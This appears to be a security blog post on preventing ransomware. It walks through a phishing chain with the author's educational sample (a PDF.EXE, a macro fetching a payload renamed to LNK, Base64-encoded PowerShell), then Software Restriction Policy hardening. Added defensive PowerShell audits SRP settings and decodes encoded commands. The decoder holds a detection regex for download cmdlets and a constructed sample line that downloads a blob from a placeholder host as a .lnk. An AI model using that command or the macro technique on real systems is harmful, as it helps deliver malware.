In this blog post, we are going to be discussing a pretty popular subject: ransomware protection. Before we start the article properly, let me tell you a little story that’s behind it.
This happened at a customer’s site. I once worked for this customer and knew a couple of people working in this company. One of them called asking if I knew a lady called Veronica, and I answered in the positive. Truth be told, Veronica is a very social lady and literally clicks on everything that moves.
It so happened that she got an email, which is the number one vehicle for ransomware, with a message saying she should click on a link that would take her to Dropbox if she wanted to listen to a voice message. But seriously, who really sends a voice message through Dropbox? Well, Veronica being the social lady she is, wanted to listen to the voice message and clicked on the link. She eventually got the ransomware, which was a variant of CryptoLocker. Not only was her own disk drive encrypted, but also the file server she was using to manage documents for traders. So, quite a sad story, especially because I got this message in the morning when everybody came to work.
Once we understand how ransomware works, we will be able to protect ourselves. Protection is not easy, because unfortunately it really depends on our budget. Even if your company doesn’t have a high budget to spend on prevention technologies, there are still a couple of effective things you can do to protect the organization.
How Ransomware Works
Our team wrote a ransomware sample, obviously not to earn money, but to teach our customers how that kind of code works. Later on, I will show you a couple of interesting techniques which you can use in your company in order to prevent it. Of course, we will also mention the solutions that work globally at the enterprise level. I want you to understand, by the end of this post, how ransomware operates and what kind of techniques it uses. Let’s dive in.
Above is an image of a typical phishing email, apparently from someone at whitehouse.gov. This is where we will start our discussion about ransomware. The document downloaded from the email looks like a transaction receipt for $100. Let’s get some information about what kind of transaction receipt this is by going to the Downloads folder in Windows.
Above is what the user sees in the Downloads folder. Of course, for someone who works in the IT industry, it is easy to spot this type of document as an application. However, since Windows hides extensions by default, a regular user literally has no chance of knowing whether this is an actual PDF document or an application.
Above is the ransomware we wrote purely for educational purposes, and since we don’t earn any money on it, you will just see a sample. In this situation, the user’s data will be encrypted.
Above is my desktop where I’ve got some documents and a secure_textfile. Now, I’m going to open the text file up.
There’s a URL to a quiz (which you should take if you haven’t done that yet) and besides that, all you will see is plain text. That’s good, because when the user opens up the transaction receipt, for example, that’s all the information he gets. Of course, this exact text doesn’t necessarily have to appear. It all depends on the policies set up in the ransomware. If the user pays attention, he will see the ‘Run’ prompt that will come up while trying to open the PDF. However, because the user just wants to open the PDF, he will click ‘Run’. This opens up the PDF but also the ransomware.
What happened behind the scenes is that this particular document got encrypted. As you can see below, it is now in encrypted form. In the end, we have to pay a ransom.
This is how ransomware gets into the enterprise. At this point, we may be wondering what went wrong here. First of all, this is one of the cases where we should definitely pay attention to the configuration of extensions in Windows. As I mentioned earlier, extensions are hidden by default. Why don’t we, for example, make them visible and teach users how to recognize malicious extensions? Of course, the process will be a little challenging, but if you run security awareness training, this could be an interesting topic.
The second thing worth paying attention to here is that it is possible to execute this particular PDF.EXE just like that. That’s the point. My team and I have been talking for the past couple of years about implementing code execution prevention, which we think is a crucial step for security in the enterprise. Surprisingly, I can tell you that in a lot of the cases we have seen, companies didn’t even start the project. This is quite disturbing, because code execution prevention is the number one prevention for this kind of situation. We are not going to mention antivirus here because it won’t really help: ransomware is a piece of code that nobody really knows before it attacks.
I would like to show you a solution. Of course, in Windows we’ve got AppLocker, but AppLocker is only available in the Enterprise Edition, which for some companies might simply be out of reach. For those, we can use third-party solutions, or we can try to implement Software Restriction Policies in a simple way. This is a pretty old solution, but when implemented well it can do a pretty good job. The general idea here is to focus on whitelisting rather than blacklisting, because we don’t want to miss anything that ransomware could potentially abuse. By default, we say that we would like to deny everything, and then on top of that we enable certain types of cases.
Before going forward, I am going to clean up the ransomware I introduced earlier so we will be able to work with it in other cases. I am also going to decrypt the text file and switch to a different machine. On this other machine, we are going to test all the possible solutions we can implement besides the enterprise solution. We will cover the AppLocker solution in another post, but this post is for everybody else who doesn’t have AppLocker available.
We’ve got Software Restriction Policies in Windows. Before we discuss that, I’ve got something for you. There’s a tool called CryptoPrevent from the guys at Foolish IT (not a nice name, right?). The tool is worth looking at because of the interesting Software Restriction Policy rules it offers. If you download the tool from their website and select ‘Advanced’ > ‘Show More Options’, you will see different types of options which we can use to prevent execution from certain known locations.
These are statistically the locations malware most often executes from. The tool is free; however, you have to pay for maintenance if you want it. We have no interest in this tool, but it’s an interesting piece of code.
We are going to apply protection as provided by the tool. Let’s do that and see if in our case, our PDF.EXE file will execute or not.
As you can see, I’ve got these copies on the desktop and we will check if they’re going to execute, and if yes, under what conditions. I will apply the protection right now using the default, but pretty good, settings. For example, one of the things that will be prevented is executing executables from the user’s profile. In order to apply it, we need to restart the PC. Once the machine is restarted, we will be ready to go.
I will log on as one of the users. Let’s see if the prevention was applied. We should get a message about successful application.
Now, we can try to open transactionreceipt.PDF.EXE. Of course, it’s a PDF.EXE, so you get a sound and a message telling you that it is not allowed, because it’s prevented by the administrator.
That is a Software Restriction Policy type of message that kind of makes sense. The question now is: if I rename the file from transactionreceipt.PDF.EXE to, let’s say, transactionreceipt.EXE, is it possible to execute it? Unfortunately, I am able to execute it, and that’s not good. On the other hand, it should be blocked from the Roaming, or AppData, user’s profile folders. Let’s find out if this is blocked.
In the rules we’ve set, we have denied any file with PDF.EXE in the name from executing. However, if it’s just an EXE and you execute it from the desktop, you will see that it will execute. Let’s see if the blocking also works from the user’s profile.
As you can see, I am blocked. The question is, how many levels down are supported by the solution? I’m going to create a folder named One and then try to execute it again. Wow, it didn’t work. Let’s do it one more time, and move it one level further down.
As you see, it opens. The solution is not perfect, but it is actually pretty good from the statistics perspective, taking into consideration how malware usually works. If we were writing our own ransomware right now, we would take this into consideration and write software that executes, say, on the third level down in the user’s profile. Of course, these solutions can be bypassed because we are blacklisting things, not whitelisting them.
This approach is OK, but is there anything we can do better? Absolutely, yes. Before we move on, let’s disable the protection. To do this, you have to go into ‘Advanced Protection’ and then reboot your PC.
Now, I will show you how to configure Software Restriction Policies, and whether it makes sense. We will also leverage a very interesting solution here where we apply the whitelisting approach: we deny everything, and on top of that we allow certain things from folders such as Windows, Program Files, etc., which are the normal locations for regular software to execute from.
We are almost ready, but we need to get to the policy, so: secpol.msc. We’ve got Software Restriction Policies here. Right-click and select New Software Restriction Policies, then go to Security Levels, where we specify that we want Disallowed set as the default.
For now, everything we try to execute gives us the sound and message notifying us that it has been blocked.
In this particular case, the software was blocked for two interesting reasons. The first is that the software is running from the 32-bit Program Files folder, which we will discuss in a moment. The other reason is that this is an LNK file, which is actually just a shortcut. If we go into the Software Restriction Policies node and then to Designated File Types, one of the file types blocked is LNK. Let’s remove it from the list and then click Apply.
At this stage, let’s try running the LNK file again. It is still blocked because it points to 32-bit software. If we go to Additional Rules, we have the Program Files directory path rule.
I will quickly create a similar rule by copying the existing one, specifying that a program in the Program Files (x86) folder is allowed to run.
This now becomes the third rule. If we try to run the LNK file again, no message or sound will pop up and the program will run fine.
We have just enabled LNK files, but is this safe behaviour? The answer to this question is ‘not really’. Let me switch to another machine.
On this other machine, you can see there is another type of phishing email saying the user should download a transactionreceipt.doc file. You can probably guess there’s going to be some kind of macro embedded in it. I want to show you how this macro works, and it’s very interesting. If we double-click on the Word document, it opens in Protected View. Now, enable editing and you get a security warning saying “In order to open this document, click Enable Content”. Now, if you don’t work in IT or are not security conscious, you will just click on “Enable Content”.
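As an added example (not part of the original post and not CryptoPrevent’s code), here is a read-only PowerShell script that audits the Software Restriction Policies state from the last two sections straight from the registry: the default security level, whether LNK is still a designated file type, and every path rule, both the CryptoPrevent-style Disallowed locations and the Unrestricted Program Files rules. The registry key is the standard SRP policy location; the function name is my own. Run it in an elevated console on the test machine.

```powershell
# Added example, not from the original post: read-only audit of the
# Software Restriction Policies configuration stored under the policy key.
$SrpKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers'

function Get-SrpAudit {
    if (-not (Test-Path $SrpKey)) {
        Write-Warning 'No Software Restriction Policy is defined on this machine.'
        return
    }
    $cfg = Get-ItemProperty -Path $SrpKey

    # DefaultLevel: 0 = Disallowed (whitelisting), 0x40000 = Unrestricted (blacklisting)
    $levelNames = @{ 0 = 'Disallowed'; 0x20000 = 'Basic User'; 0x40000 = 'Unrestricted' }
    $current = [int]$cfg.DefaultLevel
    $default = if ($levelNames.ContainsKey($current)) { $levelNames[$current] } else { "Unknown ($current)" }
    "Default security level : $default"
    if ($default -ne 'Disallowed') {
        Write-Warning 'Default is not Disallowed: this is a blacklist, so a renamed or relocated EXE may still run.'
    }

    # Designated file types: the list SRP treats as executable (the post removes LNK from it)
    $types = @($cfg.ExecutableTypes)
    "Designated file types  : $($types -join ', ')"
    if ($types -notcontains 'LNK') {
        Write-Warning 'LNK is not a designated file type: a downloaded shortcut (or a renamed payload) bypasses SRP.'
    }

    # Path rules live under <level>\Paths\<guid>, with the path itself in ItemData
    foreach ($level in $levelNames.Keys) {
        $paths = Join-Path $SrpKey "$level\Paths"
        if (-not (Test-Path $paths)) { continue }
        Get-ChildItem -Path $paths | ForEach-Object {
            $rule = Get-ItemProperty -Path $_.PSPath
            '{0,-12} {1}' -f $levelNames[$level], $rule.ItemData
        }
    }
}

Get-SrpAudit
```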
In this particular macro, what I’ve got is a very interesting piece of code. Have a look.
Here, we are downloading the encrypt.bin file and renaming it to an LNK file. That’s kind of strange, because how could we expect an LNK file to be something that executes? Well, that’s the whole point. Even though we could, for example, block all the executables, remember that we have enabled LNKs. Therefore, in this particular case, it can be a bit dangerous for us. Let me show you. Before we do it, it is important for us to see two things. First, this text file is still a text file, so it’s not encrypted yet; it’s going to be encrypted. Second, I’m going to run Procmon here. It starts monitoring pretty much immediately.
A couple of processes, such as Explorer.EXE, svchost and some others which I don’t need to monitor, are running and can make a bit of a mess. I will exclude all of those. Let’s leave a couple of processes I could be interested in.
Now that we have this running, we can go ahead and run the macro, so: Enable Content. After enabling the macro, the document becomes encrypted. What happened? We’ve got Procmon to tell us. This is quite interesting. I will stop the monitoring.
We can check, by folder, what is being written into all the different folders. Now, we need to know what is happening. I can, of course, filter this by double-clicking, and you can see below (and this is very interesting) that it was a PowerShell script that was doing something.
This is weird. If we go to the properties of the PowerShell process, we can see one of the techniques (actually my favourite) to execute code remotely. If you are afraid that special characters will not be processed properly, the PowerShell parameter -EncodedCommand is the answer.
What is executed here is Base64-encoded code. I’m going to copy that into PowerShell for now. At that stage, with this little script, I am able to decode it.
Let’s decode it using this little Base64 decoder. What we see below is our ransomware, but written in PowerShell.
This is the future. It can run as a user and it is allowed to run because it is PowerShell!
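As an added example (not from the original post), here is a small PowerShell triage helper for the technique above: it pulls the Base64 payload out of a captured powershell.exe command line, such as the one Procmon showed, decodes it the way PowerShell does for -EncodedCommand (UTF-16LE, not UTF-8), and flags the indicators this post’s macro used. The function names are my own, and the command lines at the bottom are constructed samples with placeholder URL and paths.

```powershell
# Added example, not from the original post: decode and triage a
# "powershell.exe -EncodedCommand <Base64>" command line captured by Procmon,
# Sysmon or a scheduled-task/Run-key audit.

function ConvertTo-EncodedCommand([string]$Script) {
    # Same encoding PowerShell expects for -EncodedCommand: UTF-16LE, then Base64
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

function ConvertFrom-EncodedCommandLine([string]$CommandLine) {
    # -EncodedCommand may be abbreviated (-e, -ec, -enc ...); the payload is a long Base64 token.
    # Short values such as "-ExecutionPolicy Bypass" never reach the 16-character minimum.
    $m = [regex]::Match($CommandLine, '(?i)(?:^|\s)-e[a-z]*\s+"?([A-Za-z0-9+/=]{16,})"?')
    if (-not $m.Success) { return $null }
    try {
        return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value))
    } catch {
        return $null   # not valid Base64, so not an encoded command
    }
}

function Test-SuspiciousScript([string]$Script) {
    # Indicators taken from the behaviour shown in this post: download a blob,
    # drop it as a .lnk, encrypt files, or evaluate further code at runtime.
    $indicators = [ordered]@{
        'download' = 'WebClient|DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer'
        'lnk-drop' = '\.lnk\b'
        'crypto'   = 'CryptoStream|AesManaged|Rijndael|Security\.Cryptography'
        'eval'     = 'Invoke-Expression|\biex\b'
    }
    @($indicators.Keys | Where-Object { $Script -match $indicators[$_] })
}

# Constructed samples (not real command lines): one benign, one in the style of the macro above
$benign    = "Write-Host 'nightly report finished'"
$macroLike = '(New-Object Net.WebClient).DownloadFile("http://example.invalid/encrypt.bin", "$env:TEMP\encrypt.lnk")'
$samples = @(
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand $(ConvertTo-EncodedCommand $benign)",
    "powershell.exe -nop -w hidden -enc $(ConvertTo-EncodedCommand $macroLike)",
    'powershell.exe -File C:\scripts\backup.ps1'
)

foreach ($cl in $samples) {
    $decoded = ConvertFrom-EncodedCommandLine $cl
    if ($null -eq $decoded) { "no encoded command : $cl"; continue }
    $hits = Test-SuspiciousScript $decoded
    $verdict = if ($hits.Count) { "SUSPICIOUS ($($hits -join ', '))" } else { 'decoded, no indicators' }
    "$verdict : $decoded"
}
```

The same regex and decoder work on Sysmon event 1 or 4688 command-line fields, which is where you would run this at scale rather than on a single Procmon capture.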
Mindset For Defeating Ransomware
When implementing successful prevention against ransomware, what are the three most important things we should think of?
Unfortunately, reality leaves us a little bit sad. Based on what we see during our penetration tests, a lot of companies are not ready. They definitely need to start thinking about implementing these kinds of solutions, and I hope this little post will convince you to start now.
The Geeky Part of Me
On the other hand, I’ve got a little geeky option for you. What we will do is implement something that is actually quite funny from the implementation perspective. It’s a little geeky thing that can hinder ransomware a bit. Let me start the console as an administrator, and move to the desktop of the user called Freddy. I will implement something our team was thinking about: any geeky option in Windows that could make ransomware not execute properly. Don’t get me wrong, it’s more like a cherry on a dessert than a professional solution, but have a look.
I will create a folder here. Let’s name it ###loop, and get into it. I will create a symbolic link named zero, pointing to the loop folder. I will do the same with another one named One. If we do dir /a/s/b you can now see that it’s looping.
The reason I used ### in the name is because it’s from the beginning of the ASCII table, and this is quite interesting because you might be wondering, “Okay, but how long does it take for the particular ransomware to loop here?”
First of all, if I open the transaction receipt we know from before, the PDF opens, and then it takes some time. Our ransomware will not get through because it takes a long time.
If we have a look at how many levels and how many iterations we’ve got here, taking the maximum link length into consideration, we’ve got approximately 60 levels to go down. That means we’ve got 2 to the power of 60 iterations. That’s why we name the links with one character, to get a lot of iterations, because what matters here is the number of levels.
Effectively, when we ask how many folders we can go through per second, assuming 1,000 folders are read in a second, then we need 2 to the power of 50 seconds to go through the whole structure I am displaying above. By the way, I will stop it now because the view is horrible.
The ransomware will have something to do on your computer. Sooner or later, you will notice it, because the input and output operations are very expensive and the CPU time is definitely spent on that. This is a little geeky thing you can check out in your infrastructure if you have nothing implemented right now. Of course, this might be something you need to test with your antivirus and backup solutions. It might be necessary to exclude the folder, but this is something you need to test yourself.
What we have learned here are the different kinds of options that are important from the ransomware prevention perspective.
I’m really curious about your ransomware stories: if you had any situations like this, or knew someone who did, please let us know in the comments section below. I will surely respond. I really want organizations to stop being vulnerable to ransomware, which is such a simple thing. Preventing it is also not very difficult. I’m keeping my fingers crossed for organizations to stay on the safe side. Till next week, stay safe.